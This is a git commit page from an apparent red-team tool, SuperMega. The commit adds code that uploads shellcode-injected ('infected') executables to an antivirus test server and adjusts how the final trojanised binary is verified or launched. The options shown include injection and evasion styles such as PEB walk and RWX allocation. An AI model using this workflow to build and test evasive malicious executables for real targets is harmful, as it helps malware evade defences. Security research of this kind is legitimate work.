admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-03 01:27:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

feature: send to avred for execution

Browse Source
This commit is contained in:
Dobin
2024-03-22 20:03:39 +00:00
parent da567af27e
commit 0333fc2673
4 changed files with 58 additions and 17 deletions
Download Patch File Download Diff File Expand all files Collapse all files
config.yaml
+3 -1
View File
@@ -5,4 +5,6 @@ path_masmshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\masm_s
path_runshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe' path_runshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe'
#- path_shexec = r'C:\Research\hasherezade\exec_fiber\sh-exec-fiber.exe' #- path_shexec = r'C:\Research\hasherezade\exec_fiber\sh-exec-fiber.exe'
path_sgn: 'C:\tools\sgn2.1\sgn.exe' path_sgn: 'C:\tools\sgn2.1\sgn.exe'
avred_server: "192.168.1.1:8001"
requirements.txt
+2 -1
View File
@@ -4,4 +4,5 @@ capstone
keystone-engine keystone-engine
jinja2 jinja2
Pygments Pygments
ansi2html ansi2html
requests
sender.py
+37
View File
@@ -0,0 +1,37 @@
import requests as req
import logging
import brotli
import os
import time
import shutil
from config import config
def scannerDetectsBytes(data: bytes, filename: str, useBrotli=True, verify=False):
params = { 'filename': filename, 'brotli': useBrotli, 'verify': verify }
if useBrotli:
scanData = brotli.compress(data)
else:
scanData = data
timeStart = time.time()
print("Send to exec/exe: {}".format(params))
res = req.post("{}/exec/exe".format(config.get("avred_server")), params=params, data=scanData, timeout=10)
jsonRes = res.json()
print("Response: {}".format(jsonRes))
scanTime = round(time.time() - timeStart, 3)
# basically internal server error, e.g. AMSI not working
if res.status_code != 200:
logging.error("Error Code {}: {}".format(res.status_code, res.text))
raise Exception("Server error, aborting")
return jsonRes
def main():
with open("data/exes/7z-verify.exe", "rb") as f:
data = f.read()
res = scannerDetectsBytes(data, "test.exe")
print("Answer: {}".format(res))
supermega.py
+16 -15
View File
@@ -13,12 +13,10 @@ import phases.assembler
import phases.injector import phases.injector
from observer import observer from observer import observer
from pe.pehelper import extract_code_from_exe_file_ep from pe.pehelper import extract_code_from_exe_file_ep
from sender import scannerDetectsBytes
from model.project import Project from model.project import Project
from model.settings import Settings from model.settings import Settings
from model.defs import * from model.defs import *
from model.carrier import Carrier
from model.exehost import ExeHost
from log import setup_logging, writelog from log import setup_logging, writelog
@@ -60,7 +58,6 @@ def main():
settings.source_style = SourceStyle.peb_walk settings.source_style = SourceStyle.peb_walk
elif args.sourcestyle == "iat_reuse": elif args.sourcestyle == "iat_reuse":
settings.source_style = SourceStyle.iat_reuse settings.source_style = SourceStyle.iat_reuse
if args.alloc: if args.alloc:
if args.alloc == "rwx_1": if args.alloc == "rwx_1":
settings.alloc_style = AllocStyle.RWX settings.alloc_style = AllocStyle.RWX
@@ -72,7 +69,6 @@ def main():
if args.exec: if args.exec:
if args.exec == "direct_1": if args.exec == "direct_1":
settings.exec_style = ExecStyle.CALL settings.exec_style = ExecStyle.CALL
if args.inject: if args.inject:
if args.rbrunmode == "eop": if args.rbrunmode == "eop":
settings.inject_mode = InjectStyle.ChangeEntryPoint settings.inject_mode = InjectStyle.ChangeEntryPoint
@@ -88,7 +84,6 @@ def main():
logger.error("Require: --shellcode <shellcode file> --inject <injectable.exe>") logger.error("Require: --shellcode <shellcode file> --inject <injectable.exe>")
logger.info(r"Example: .\supermega.py --shellcode .\data\shellcodes\calc64.bin --inject .\data\exes\7z.exe") logger.info(r"Example: .\supermega.py --shellcode .\data\shellcodes\calc64.bin --inject .\data\exes\7z.exe")
return 1 return 1
if args.shellcode: if args.shellcode:
if not os.path.isfile(args.shellcode): if not os.path.isfile(args.shellcode):
logger.info("Could not find: {}".format(args.shellcode)) logger.info("Could not find: {}".format(args.shellcode))
@@ -191,15 +186,21 @@ def start(settings: Settings):
observer.add_code("exe_final", extract_code_from_exe_file_ep(settings.inject_exe_out, 300)) observer.add_code("exe_final", extract_code_from_exe_file_ep(settings.inject_exe_out, 300))
# Start/verify it at the end if config.get("avred_server") != "":
if settings.verify: with open(settings.inject_exe_out, "rb") as f:
logger.info("--[ Verify infected exe") data = f.read()
exit_code = phases.injector.verify_injected_exe(settings.inject_exe_out) scannerDetectsBytes(data, "test.exe", useBrotli=True, verify=settings.verify)
elif settings.try_start_final_infected_exe:
logger.info("--[ Start infected exe: {}".format(settings.inject_exe_out)) else:
run_process_checkret([ # Start/verify it at the end
settings.inject_exe_out, if settings.verify:
], check=False) logger.info("--[ Verify infected exe")
exit_code = phases.injector.verify_injected_exe(settings.inject_exe_out)
elif settings.try_start_final_infected_exe:
logger.info("--[ Start infected exe: {}".format(settings.inject_exe_out))
run_process_checkret([
settings.inject_exe_out,
], check=False)
# Cleanup files # Cleanup files
if settings.cleanup_files_on_exit: if settings.cleanup_files_on_exit: